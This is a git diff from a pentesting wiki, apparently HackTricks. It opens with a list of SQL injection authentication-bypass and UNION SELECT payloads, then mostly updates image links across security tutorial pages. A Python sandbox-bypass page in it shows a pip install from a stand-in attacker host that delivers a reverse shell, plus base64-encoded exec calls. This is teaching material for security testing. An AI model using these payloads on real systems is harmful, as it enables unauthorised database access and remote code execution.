+" UniON SElecT 1,2,3,4-- 2 +" UniON SElecT 1,2,3,4,5-- 2 +" UniON SElecT 1,2# +" UniON SElecT 1,2,3# +" UniON SElecT 1,2,3,4# +" UniON SElecT 1,2,3,4,5# +"UniON(SElecT(1),2)-- 2 +"UniON(SElecT(1),2,3)-- 2 +"UniON(SElecT(1),2,3,4)-- 2 +"UniON(SElecT(1),2,3,4,5)-- 2 +"UniON(SElecT(1),2)# +"UniON(SElecT(1),2,3)# +"UniON(SElecT(1),2,3,4)# +"UniON(SElecT(1),2,3,4,5)# + +'||'2 +'||2-- 2 +'||'2'||' +'||2# +'||2/* +'||2||' +"||"2 +"||2-- 2 +"||"2"||" +"||2# +"||2/* +"||2||" +'||'2'='2 +'||'2'='2'||' +'||2=2-- 2 +'||2=2# +'||2=2/* +'||2=2||' +"||"2"="2 +"||"2"="2"||" +"||2=2-- 2 +"||2=2# +"||2=2/* +"||2=2||" +'||2=(2)LimIT(1)-- 2 +'||2=(2)LimIT(1)# +'||2=(2)LimIT(1)/* +"||2=(2)LimIT(1)-- 2 +"||2=(2)LimIT(1)# +"||2=(2)LimIT(1)/* +'||true-- 2 +'||true# +'||true/* +'||true||' +"||true-- 2 +"||true# +"||true/* +"||true||" +'||'2'LiKE'2 +'||'2'LiKE'2'-- 2 +'||'2'LiKE'2'# +'||'2'LiKE'2'/* +'||'2'LiKE'2'||' +'||(2)LiKE(2)-- 2 +'||(2)LiKE(2)# +'||(2)LiKE(2)/* +'||(2)LiKE(2)||' +"||"2"LiKE"2 +"||"2"LiKE"2"-- 2 +"||"2"LiKE"2"# +"||"2"LiKE"2"/* +"||"2"LiKE"2"||" +"||(2)LiKE(2)-- 2 +"||(2)LiKE(2)# +"||(2)LiKE(2)/* +"||(2)LiKE(2)||" + +')oR('2 +')oR'2'-- 2 +')oR'2'# +')oR'2'/* +')oR'2'oR(' +')oR(2)-- 2 +')oR(2)# +')oR(2)/* +')oR(2)oR(' +')oR 2-- 2 +')oR 2# +')oR 2/* +')oR 2 oR(' +')oR/**/2-- 2 +')oR/**/2# +')oR/**/2/* +')oR/**/2/**/oR(' +")oR("2 +")oR"2"-- 2 +")oR"2"# +")oR"2"/* +")oR"2"oR(" +")oR(2)-- 2 +")oR(2)# +")oR(2)/* +")oR(2)oR(" +")oR 2-- 2 +")oR 2# +")oR 2/* +")oR 2 oR(" +")oR/**/2-- 2 +")oR/**/2# +")oR/**/2/* +")oR/**/2/**/oR(" +')oR'2'=('2 +')oR'2'='2'oR(' +')oR'2'='2'-- 2 +')oR'2'='2'# +')oR'2'='2'/* +')oR'2'='2'oR(' +')oR 2=2-- 2 +')oR 2=2# +')oR 2=2/* +')oR 2=2 oR(' +')oR/**/2=2-- 2 +')oR/**/2=2# +')oR/**/2=2/* +')oR/**/2=2/**/oR(' +')oR(2)=2-- 2 +')oR(2)=2# +')oR(2)=2/* +')oR(2)=2/* +')oR(2)=(2)oR(' +')oR'2'='2' LimIT 1-- 2 +')oR'2'='2' LimIT 1# +')oR'2'='2' LimIT 1/* +')oR(2)=(2)LimIT(1)-- 2 +')oR(2)=(2)LimIT(1)# +')oR(2)=(2)LimIT(1)/* +")oR"2"=("2 +")oR"2"="2"oR(" +")oR"2"="2"-- 2 +")oR"2"="2"# +")oR"2"="2"/* +")oR"2"="2"oR(" +")oR 2=2-- 2 +")oR 2=2# +")oR 2=2/* +")oR 2=2 oR(" +")oR/**/2=2-- 2 +")oR/**/2=2# +")oR/**/2=2/* +")oR/**/2=2/**/oR(" +")oR(2)=2-- 2 +")oR(2)=2# +")oR(2)=2/* +")oR(2)=2/* +")oR(2)=(2)oR(" +")oR"2"="2" LimIT 1-- 2 +")oR"2"="2" LimIT 1# +")oR"2"="2" LimIT 1/* +")oR(2)=(2)LimIT(1)-- 2 +")oR(2)=(2)LimIT(1)# +")oR(2)=(2)LimIT(1)/* +')oR true-- 2 +')oR true# +')oR true/* +')oR true oR(' +')oR(true)-- 2 +')oR(true)# +')oR(true)/* +')oR(true)oR(' +')oR/**/true-- 2 +')oR/**/true# +')oR/**/true/* +')oR/**/true/**/oR(' +")oR true-- 2 +")oR true# +")oR true/* +")oR true oR(" +")oR(true)-- 2 +")oR(true)# +")oR(true)/* +")oR(true)oR(" +")oR/**/true-- 2 +")oR/**/true# +")oR/**/true/* +")oR/**/true/**/oR(" +')oR'2'LiKE('2 +')oR'2'LiKE'2'-- 2 +')oR'2'LiKE'2'# +')oR'2'LiKE'2'/* +')oR'2'LiKE'2'oR(' +')oR(2)LiKE(2)-- 2 +')oR(2)LiKE(2)# +')oR(2)LiKE(2)/* +')oR(2)LiKE(2)oR(' +")oR"2"LiKE("2 +")oR"2"LiKE"2"-- 2 +")oR"2"LiKE"2"# +")oR"2"LiKE"2"/* +")oR"2"LiKE"2"oR(" +")oR(2)LiKE(2)-- 2 +")oR(2)LiKE(2)# +")oR(2)LiKE(2)/* +")oR(2)LiKE(2)oR(" +admin')-- 2 +admin')# +admin')/* +admin")-- 2 +admin")# +') UniON SElecT 1,2-- 2 +') UniON SElecT 1,2,3-- 2 +') UniON SElecT 1,2,3,4-- 2 +') UniON SElecT 1,2,3,4,5-- 2 +') UniON SElecT 1,2# +') UniON SElecT 1,2,3# +') UniON SElecT 1,2,3,4# +') UniON SElecT 1,2,3,4,5# +')UniON(SElecT(1),2)-- 2 +')UniON(SElecT(1),2,3)-- 2 +')UniON(SElecT(1),2,3,4)-- 2 +')UniON(SElecT(1),2,3,4,5)-- 2 +')UniON(SElecT(1),2)# +')UniON(SElecT(1),2,3)# +')UniON(SElecT(1),2,3,4)# +')UniON(SElecT(1),2,3,4,5)# +") UniON SElecT 1,2-- 2 +") UniON SElecT 1,2,3-- 2 +") UniON SElecT 1,2,3,4-- 2 +") UniON SElecT 1,2,3,4,5-- 2 +") UniON SElecT 1,2# +") UniON SElecT 1,2,3# +") UniON SElecT 1,2,3,4# +") UniON SElecT 1,2,3,4,5# +")UniON(SElecT(1),2)-- 2 +")UniON(SElecT(1),2,3)-- 2 +")UniON(SElecT(1),2,3,4)-- 2 +")UniON(SElecT(1),2,3,4,5)-- 2 +")UniON(SElecT(1),2)# +")UniON(SElecT(1),2,3)# +")UniON(SElecT(1),2,3,4)# +")UniON(SElecT(1),2,3,4,5)# +')||('2 +')||2-- 2 +')||'2'||(' +')||2# +')||2/* +')||2||(' +")||("2 +")||2-- 2 +")||"2"||(" +")||2# +")||2/* +")||2||(" +')||'2'=('2 +')||'2'='2'||(' +')||2=2-- 2 +')||2=2# +')||2=2/* +')||2=2||(' +")||"2"=("2 +")||"2"="2"||(" +")||2=2-- 2 +")||2=2# +")||2=2/* +")||2=2||(" +')||2=(2)LimIT(1)-- 2 +')||2=(2)LimIT(1)# +')||2=(2)LimIT(1)/* +")||2=(2)LimIT(1)-- 2 +")||2=(2)LimIT(1)# +")||2=(2)LimIT(1)/* +')||true-- 2 +')||true# +')||true/* +')||true||(' +")||true-- 2 +")||true# +")||true/* +")||true||(" +')||'2'LiKE('2 +')||'2'LiKE'2'-- 2 +')||'2'LiKE'2'# +')||'2'LiKE'2'/* +')||'2'LiKE'2'||(' +')||(2)LiKE(2)-- 2 +')||(2)LiKE(2)# +')||(2)LiKE(2)/* +')||(2)LiKE(2)||(' +")||"2"LiKE("2 +")||"2"LiKE"2"-- 2 +")||"2"LiKE"2"# +")||"2"LiKE"2"/* +")||"2"LiKE"2"||(" +")||(2)LiKE(2)-- 2 +")||(2)LiKE(2)# +")||(2)LiKE(2)/* +")||(2)LiKE(2)||(" +' UnION SELeCT 1,2` +' UnION SELeCT 1,2,3` +' UnION SELeCT 1,2,3,4` +' UnION SELeCT 1,2,3,4,5` +" UnION SELeCT 1,2` +" UnION SELeCT 1,2,3` +" UnION SELeCT 1,2,3,4` +" UnION SELeCT 1,2,3,4,5` \ No newline at end of file diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 6bbd119f..34777ff2 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -10,7 +10,7 @@ dht udp "DHT Nodes" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1).png>) +![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png>) InfluxDB diff --git a/README.md b/README.md index 66ebe5d4..fc7e0acb 100644 --- a/README.md +++ b/README.md @@ -42,7 +42,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm ### [**INE**](https://ine.com) -![](<.gitbook/assets/INE\_Logo (3).jpg>) +![](.gitbook/assets/ine\_logo-3-.jpg) [**INE**](https://ine.com) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com)**.** diff --git a/cloud-security/atlantis.md b/cloud-security/atlantis.md index 451be20c..2eeed724 100644 --- a/cloud-security/atlantis.md +++ b/cloud-security/atlantis.md @@ -287,7 +287,7 @@ Moreover, if you don't have configured in the **branch protection** to ask to ** This is the **setting** in Github branch protections: -![](<../.gitbook/assets/image (307).png>) +![](<../.gitbook/assets/image (375) (1).png>) ### Webhook Secret diff --git a/cloud-security/concourse/concourse-architecture.md b/cloud-security/concourse/concourse-architecture.md index 3c8f0610..9ca2cb87 100644 --- a/cloud-security/concourse/concourse-architecture.md +++ b/cloud-security/concourse/concourse-architecture.md @@ -2,7 +2,7 @@ ## Architecture -![](<../../.gitbook/assets/image (307) (3) (1).png>) +![](<../../.gitbook/assets/image (651) (1).png>) ### ATC: web UI & build scheduler diff --git a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md index aca64f0b..a0e143ff 100644 --- a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md +++ b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md @@ -17,7 +17,7 @@ Note that other cloud resources could be searched for and that some times these As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...). -![](<../../.gitbook/assets/image (618).png>) +![](<../../.gitbook/assets/image (628) (1) (1) (1).png>) The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names: diff --git a/ctf-write-ups/try-hack-me/pickle-rick.md b/ctf-write-ups/try-hack-me/pickle-rick.md index a4efeffa..908c498e 100644 --- a/ctf-write-ups/try-hack-me/pickle-rick.md +++ b/ctf-write-ups/try-hack-me/pickle-rick.md @@ -8,7 +8,7 @@ This machine was categorised as easy and it was pretty easy. I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion): -![](<../../.gitbook/assets/image (79) (1).png>) +![](<../../.gitbook/assets/image (79) (2).png>) In as you can see 2 ports are open: 80 (**HTTP**) and 22 (**SSH**) diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md index 521b1c83..116c79bf 100644 --- a/exploiting/linux-exploiting-basic-esp/README.md +++ b/exploiting/linux-exploiting-basic-esp/README.md @@ -387,7 +387,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`** Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT` -![](<../../.gitbook/assets/image (620).png>) +![](<../../.gitbook/assets/image (620) (1) (1).png>) Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table: @@ -456,7 +456,7 @@ For example, in the following situation there is a **local variable in the stack So, flag is in **0xffffcf4c** -![](<../../.gitbook/assets/image (622).png>) +![](<../../.gitbook/assets/image (618) (2).png>) And from the leak you can see the **pointer to the flag** is in the **8th** parameter: diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index d40ef599..c8fbf905 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -47,7 +47,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command) -![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2) (2).png>) +![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (2).png>) An then use the following code diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md index 2a55a22e..4ae39df9 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md @@ -134,7 +134,7 @@ Some interesting attributes: * [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) (among others): * Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides. -![](<../../../.gitbook/assets/image (507) (1).png>) +![](<../../../.gitbook/assets/image (507) (1) (1).png>) ![](<../../../.gitbook/assets/image (509).png>) diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index ef5a15e9..811daaa1 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -60,7 +60,7 @@ This tool is also useful to get **other information analysed** from the packets You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\ This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**. -![](<../../../.gitbook/assets/image (567) (1) (1).png>) +![](<../../../.gitbook/assets/image (567) (1).png>) ### [BruteShark](https://github.com/odedshimon/BruteShark) diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index 1378c59f..0f43fa29 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -83,7 +83,7 @@ You can add a column that show the Host HTTP header: And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**): -![](<../../../.gitbook/assets/image (408) (1).png>) +![](<../../../.gitbook/assets/image (408).png>) ## Identifying local hostnames diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index 0c07eb93..a9b43a0e 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -36,7 +36,7 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle ``` -![](<../../../.gitbook/assets/image (495) (1) (1).png>) +![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>) ### Volume Shadow Copies @@ -134,7 +134,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (3).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (3).png>) ### USB Detective diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 1d55b8e6..fd616b6a 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -133,7 +133,7 @@ Within this registry it's possible to find: ![](<../../../.gitbook/assets/image (477).png>) -![](<../../../.gitbook/assets/image (479) (1) (1).png>) +![](<../../../.gitbook/assets/image (479) (1).png>) Moreover, checking the registry `HKLM\SYSTEM\ControlSet001\Enum\USB` and comparing the values of the sub-keys it's possible to find the VID value @@ -153,7 +153,7 @@ Having the **{GUID}** of the device it's now possible to **check all the NTUDER. Checking the registry `System\MoutedDevices` it's possible to find out **which device was the last one mounted**. In the following image check how the last device mounted in `E:` is the Thoshiba one (using the tool Registry Explorer). -![](<../../../.gitbook/assets/image (483) (1).png>) +![](<../../../.gitbook/assets/image (483) (1) (1).png>) ### Volume Serial Number diff --git a/linux-unix/privilege-escalation/linux-capabilities.md b/linux-unix/privilege-escalation/linux-capabilities.md index 088ee5f6..625a1ddc 100644 --- a/linux-unix/privilege-escalation/linux-capabilities.md +++ b/linux-unix/privilege-escalation/linux-capabilities.md @@ -941,7 +941,7 @@ int main(int argc,char* argv[] ) I exploit needs to find a pointer to something mounted on the host. The original exploit used the file /.dockerinit and this modified version uses /etc/hostname. If the exploit isn't working maybe you need to set a different file. To find a file that is mounted in the host just execute mount command: {% endhint %} -![](<../../.gitbook/assets/image (407) (2).png>) +![](<../../.gitbook/assets/image (407) (1).png>) **The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) diff --git a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md b/macos/macos-security-and-privilege-escalation/mac-os-architecture.md index 8ffe29e1..a58fd989 100644 --- a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md +++ b/macos/macos-security-and-privilege-escalation/mac-os-architecture.md @@ -193,7 +193,7 @@ The offsets of any constructors are held in the **\_\_mod\_init\_func** section The heart of the file is the final region, the data, which consists of a number of segments as laid out in the load-commands region. **Each segment can contain a number of data sections**. Each of these sections **contains code or data** of one particular type. -![](<../../.gitbook/assets/image (555).png>) +![](<../../.gitbook/assets/image (507) (3).png>) #### Get the info diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md index 2f49900c..87d5e2e2 100644 --- a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md +++ b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md @@ -108,7 +108,7 @@ It follows a few steps to get the Activation Record performed by **`MCTeslaConfi 2. The JSON payload is encrypted using Absinthe (**`NACSign`**) 3. All requests over HTTPs, built-in root certificates are used -![](<../../../.gitbook/assets/image (566) (1).png>) +![](<../../../.gitbook/assets/image (566).png>) The response is a JSON dictionary with some important data like: @@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like: * Signed using the **device identity certificate (from APNS)** * **Certificate chain** includes expired **Apple iPhone Device CA** -![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1).png>) +![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png>) ### Step 6: Profile Installation diff --git a/misc/basic-python/bypass-python-sandboxes/README.md b/misc/basic-python/bypass-python-sandboxes/README.md index 5223dbeb..9e9ceea5 100644 --- a/misc/basic-python/bypass-python-sandboxes/README.md +++ b/misc/basic-python/bypass-python-sandboxes/README.md @@ -85,7 +85,7 @@ pip.main(["install", "http://attacker.com/Rerverse.tar.gz"]) You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**: -{% file src="../../../.gitbook/assets/Reverse.tar.gz" %} +{% file src="../../../.gitbook/assets/reverse.tar.gz" %} {% hint style="info" %} This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave. @@ -121,7 +121,7 @@ exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk=')) * [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html) * [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html) -If you can access to the**`__builtins__`** object you can import libraries (notice that you could also use here other string representation showed in last section): +If you can access to the\*\*`__builtins__`\*\* object you can import libraries (notice that you could also use here other string representation showed in last section): ```python __builtins__.__import__("os").system("ls") @@ -499,7 +499,7 @@ You can check the output of this script in this page: If you **send** a **string** to python that is going to be **formatted**, you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example. {% hint style="info" %} -However, there is a **limitation**, you can only use the symbols `.[]`, so you **won't be able to execute arbitrary code**, just to read information. \ +However, there is a **limitation**, you can only use the symbols `.[]`, so you **won't be able to execute arbitrary code**, just to read information.\ _**If you know how to execute code through this vulnerability, please contact me.**_ {% endhint %} @@ -751,6 +751,7 @@ First of all, we need to know **how to create and execute a code object** so we ```python code_type = type((lambda: None).__code__) +# Check the following hint if you get an error in calling this code_obj = code_type(co_argcount, co_kwonlyargcount, co_nlocals, co_stacksize, co_flags, co_code, co_consts, co_names, @@ -767,6 +768,16 @@ mydict['__builtins__'] = __builtins__ function_type(code_obj, mydict, None, None, None)("secretcode") ``` +{% hint style="info" %} +Depending on the python version the **parameters** of `code_type` may have a **different order**. The best way to know the order of the params in the python version you are running is to run: + +``` +import types +types.CodeType.__doc__ +'code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n flags, codestring, constants, names, varnames, filename, name,\n firstlineno, lnotab[, freevars[, cellvars]])\n\nCreate a code object. Not for the faint of heart.' +``` +{% endhint %} + ### Recreating a leaked function {% hint style="warning" %} diff --git a/mobile-apps-pentesting/android-app-pentesting/README.md b/mobile-apps-pentesting/android-app-pentesting/README.md index 4f0d4a2b..233e50fb 100644 --- a/mobile-apps-pentesting/android-app-pentesting/README.md +++ b/mobile-apps-pentesting/android-app-pentesting/README.md @@ -3,14 +3,13 @@ {% hint style="warning" %} **Support HackTricks and get benefits!** -Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? -Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -28,7 +27,7 @@ It's highly recommended to start reading this page to know about the **most impo This is the main tool you need to connect to an android device (emulated or physical).\ It allows you to control your device over **USB** or **Network** from a computer, **copy** files back and forth, **install** and uninstall apps, run **shell** commands, perform **backups**, read **logs** and more. -Take a look to the following list of [**ADB Commands**](adb-commands.md) \_**\_to learn how to use adb. +Take a look to the following list of [**ADB Commands**](adb-commands.md) \_\*\*\_to learn how to use adb. ## Smali @@ -307,7 +306,7 @@ Drozer is s useful tool to **exploit exported activities, exported services and ### Exploiting exported Activities [**Read this if you want to remind what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\ -\_**\_Also remember that the code of an activity starts with the `onCreate` method. +\_\*\*\_Also remember that the code of an activity starts with the `onCreate` method. #### Authorisation bypass @@ -342,7 +341,7 @@ Content providers are basically used to **share data**. If an app has available ### **Exploiting Services** [**Read this if you want to remind what is a Service.**](android-applications-basics.md#services)\ -\_**\_Remember that a the actions of a Service start in the method `onStartCommand`. +\_\*\*\_Remember that a the actions of a Service start in the method `onStartCommand`. As service is basically something that **can receive data**, **process** it and **returns** (or not) a response. Then, if an application is exporting some services you should **check** the **code** to understand what is it doing and **test** it **dynamically** for extracting confidential info, bypassing authentication measures...\ [**Learn how to exploit Services with Drozer.**](drozer-tutorial/#services) @@ -350,7 +349,7 @@ As service is basically something that **can receive data**, **process** it and ### **Exploiting Broadcast Receivers** [**Read this if you want to remind what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\ -\_**\_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`. +\_\*\*\_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`. A broadcast receiver will be waiting for a type of message. Depending on ho the receiver handles the message it could be vulnerable.\ [**Learn how to exploit Broadcast Receivers with Drozer.**](./#exploiting-broadcast-receivers) @@ -377,7 +376,7 @@ _Note that you can **omit the package name** and the mobile will automatically c In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**. -![](<../../.gitbook/assets/image (436) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (436) (1) (1).png>) #### Sensitive info @@ -497,7 +496,7 @@ By default, it will also use some Frida Scripts to **bypass SSL pinning**, **roo MobSF can also **invoke exported activities**, grab **screenshots** of them and **save** them for the report. To **start** the dynamic testing press the green bottom: "**Start Instrumentation**". Press the "**Frida Live Logs**" to see the logs generated by the Frida scripts and "**Live API Monitor**" to see all the invocation to hooked methods, arguments passed and returned values (this will appear after pressing "Start Instrumentation").\ -MobSF also allows you to load your own **Frida scripts (**to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**"). +MobSF also allows you to load your own \*\*Frida scripts (\*\*to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**"). ![](<../../.gitbook/assets/image (215).png>) diff --git a/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md index 3435bf17..efd9c0c6 100644 --- a/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md +++ b/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md @@ -223,7 +223,7 @@ In this case you could try to abuse the functionality creating a web with the fo In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**. -![](<../../.gitbook/assets/image (436) (1) (1).png>) +![](<../../.gitbook/assets/image (436) (1) (1) (1).png>) Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links). diff --git a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md index cefa094f..01b4394e 100644 --- a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md +++ b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md @@ -36,7 +36,7 @@ GDA is also a powerful and fast reverse analysis platform. Which does not only s **Only for Windows.** -![](<../../.gitbook/assets/image (207) (1).png>) +![](<../../.gitbook/assets/image (207) (1) (1).png>) ### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases) diff --git a/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md b/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md index 75a7dba9..60bf71a3 100644 --- a/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md +++ b/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md @@ -210,7 +210,7 @@ However there are **a lot of different command line useful options** that you ca First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_ -![](<../../.gitbook/assets/image (367) (1).png>) +![](<../../.gitbook/assets/image (367).png>) **Export the certificate in Der format** and lets **transform** it to a form that **Android** is going to be able to **understand.** Note that **in order to configure the burp certificate on the Android machine in AVD** you need to **run** this machine **with** the **`-writable-system`** option.\ For example you can run it like: diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index ffc1ba52..380458a6 100644 --- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/ You should also check the **ContentProvider code** to search for queries: -![](<../../../.gitbook/assets/image (121) (1) (1).png>) +![](<../../../.gitbook/assets/image (121) (1) (1) (1).png>) Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method: @@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n ![](<../../../.gitbook/assets/image (187).png>) -![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1).png>) Because you will be able to call them diff --git a/mobile-apps-pentesting/ios-pentesting/README.md b/mobile-apps-pentesting/ios-pentesting/README.md index f43cc47c..01184086 100644 